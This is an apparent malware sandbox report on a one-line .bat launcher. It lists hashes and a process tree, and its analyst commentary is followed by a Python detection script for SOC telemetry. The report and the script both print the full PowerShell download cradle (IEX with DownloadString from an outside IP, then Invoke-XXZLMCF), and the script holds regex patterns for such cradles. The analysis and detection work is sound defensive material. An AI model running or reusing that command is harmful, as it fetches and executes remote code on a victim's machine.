Analysis
- max time kernel: 131s
- max time network: 74s
- platform: windows10_x64
- resource: win10v200430
- submitted: 02-06-2020 10:10

Static task: static1

Behavioral task: behavioral1
- Sample: b0d58156fab428d26b46727824eabf37.bat
- Resource: win7v200430 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: b0d58156fab428d26b46727824eabf37.bat
- Resource: win10v200430 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: b0d58156fab428d26b46727824eabf37.bat
- Size: 214B
- MD5: 80701ef329f0effbde1182ab9f26be31
- SHA1: b948c5f5d1d8d2f7bb793db6ed2119d8143b8084
- SHA256: bfecfd11f233e3531ec0241d1186c28fd737e3b476a51e4000312296ab8c0c1c
- SHA512: f2a24c2587f2621b2a9d571522a4e0126af41f482d2e942579c199acacb98a4783dd03f06635173f59c6e37c2ad55f8778a7c0841e4848dee533ddf232ce5b9d
- Score: 10/10
Malware Config

Extracted
- Language: ps1
- Source: URLs
- ps1.dropper: http://185.103.242.78/pastes/b0d58156fab428d26b46727824eabf37
Signatures

Program crash (1 IoC)
  pid   pid_target  process       target process
  2148  1840        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description                pid   process
  Token: SeRestorePrivilege  2148  WerFault.exe
  Token: SeBackupPrivilege   2148  WerFault.exe
  Token: SeDebugPrivilege    2148  WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
  pid   process
  2148  WerFault.exe  (14 occurrences)
Processes

1. C:\Windows\system32\cmd.exe (PID 1572)
   C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b0d58156fab428d26b46727824eabf37.bat"

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1840)
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b0d58156fab428d26b46727824eabf37');Invoke-XXZLMCF;Start-Sleep -s 10000"

      3. C:\Windows\SysWOW64\WerFault.exe (PID 2148)
         C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 704
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses

The 214-byte .bat is a one-line launcher. cmd.exe runs it, and it starts the 32-bit PowerShell host (SysWOW64 on an x64 install) with an in-memory download cradle: DownloadString fetches the text at the paste URL, IEX executes that text as PowerShell without ever writing a script file to disk, Invoke-XXZLMCF is not a built-in cmdlet and so must be defined by the fetched script, and Start-Sleep -s 10000 keeps the host alive afterwards. The fetched script itself is not captured in this report; only its URL is (see Malware Config, ps1.dropper).

powershell.exe (PID 1840) then crashed and WerFault.exe (PID 2148) attached to it (-p 1840). All three signature hits on this page come from WerFault.exe, which opens the crashed process with SeDebugPrivilege and enumerates processes as part of normal crash reporting, so they describe the crash handler rather than the payload. The actionable indicators are the dropper URL and the command-line pattern; because the host crashed, the second stage may not have run to completion in this sandbox.
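As an added example (not part of this report or of the sandbox's own tooling), the detection logic a SOC would run over process-creation telemetry to catch this chain: flag PowerShell command lines that pair IEX/Invoke-Expression with a network fetch, pull out the URL, note the 32-bit host and the long sleep, and correlate a later WerFault.exe -p <pid> so the analyst knows the flagged process crashed. The events, their field names, and the two benign control entries are constructed for the example; they mirror the process tree above but are not the sandbox's schema.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events (Sysmon Event ID 1 style). The field
# names are an assumption made for this example, not the sandbox's own schema.
# Events 1-3 mirror the process tree in the report; 4-5 are benign controls.
EVENTS = [
    {"pid": 1572, "ppid": 900,
     "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b0d58156fab428d26b46727824eabf37.bat"'},
    {"pid": 1840, "ppid": 1572,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"""C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b0d58156fab428d26b46727824eabf37');Invoke-XXZLMCF;Start-Sleep -s 10000" """.strip()},
    {"pid": 2148, "ppid": 1840,
     "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 704"},
    {"pid": 3001, "ppid": 900,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"pid": 3002, "ppid": 3001,
     "image": r"C:\Windows\System32\WerFault.exe",
     "cmdline": r"C:\Windows\System32\WerFault.exe -u -p 3001 -s 512"},
]

# A "download cradle" is an in-memory fetch handed straight to IEX, so both
# halves must be present on the same command line (in either order).
IEX_RE = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.IGNORECASE)
FETCH_RE = re.compile(
    r"DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b",
    re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+")
SLEEP_RE = re.compile(r"Start-Sleep\s+-s(?:econds)?\s+(\d+)", re.IGNORECASE)
# WerFault.exe -p <pid> names the process that crashed.
WERFAULT_RE = re.compile(r"WerFault\.exe\b.*?-p\s+(\d+)", re.IGNORECASE)


@dataclass
class Finding:
    pid: int      # the process the finding is about (not necessarily the emitter)
    rule: str
    detail: str


def basename(path):
    return path.rsplit("\\", 1)[-1]


def ancestry(events, pid):
    """Image names from the outermost known ancestor down to pid."""
    by_pid = {ev["pid"]: ev for ev in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def detect(events):
    findings, flagged = [], set()
    for ev in events:
        if basename(ev["image"]).lower() not in ("powershell.exe", "pwsh.exe"):
            continue
        cl = ev["cmdline"]
        if not (IEX_RE.search(cl) and FETCH_RE.search(cl)):
            continue
        flagged.add(ev["pid"])
        notes = ["url=" + u for u in URL_RE.findall(cl)]
        if "\\syswow64\\" in ev["image"].lower():
            notes.append("32-bit PowerShell host on 64-bit Windows")
        m = SLEEP_RE.search(cl)
        if m and int(m.group(1)) >= 600:
            notes.append(f"long sleep after payload ({m.group(1)}s)")
        findings.append(Finding(ev["pid"], "powershell_download_cradle", "; ".join(notes)))
    # Second pass: a crash handler attaching to a flagged process means the
    # fetched stage may not have finished, which matters for scoping.
    for ev in events:
        m = WERFAULT_RE.search(ev["cmdline"])
        if m and int(m.group(1)) in flagged:
            findings.append(Finding(int(m.group(1)), "flagged_process_crashed",
                                    f"WerFault.exe pid {ev['pid']} attached; fetched stage may not have completed"))
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f.pid, f.rule, f.detail, "|", " > ".join(ancestry(EVENTS, f.pid)))
```

The two-pass structure is deliberate: the crash rule only fires for processes the cradle rule already flagged, so ordinary WerFault activity (the benign control, PID 3002) stays silent, and the ancestry helper gives the analyst the cmd.exe > powershell.exe > WerFault.exe chain that this report shows.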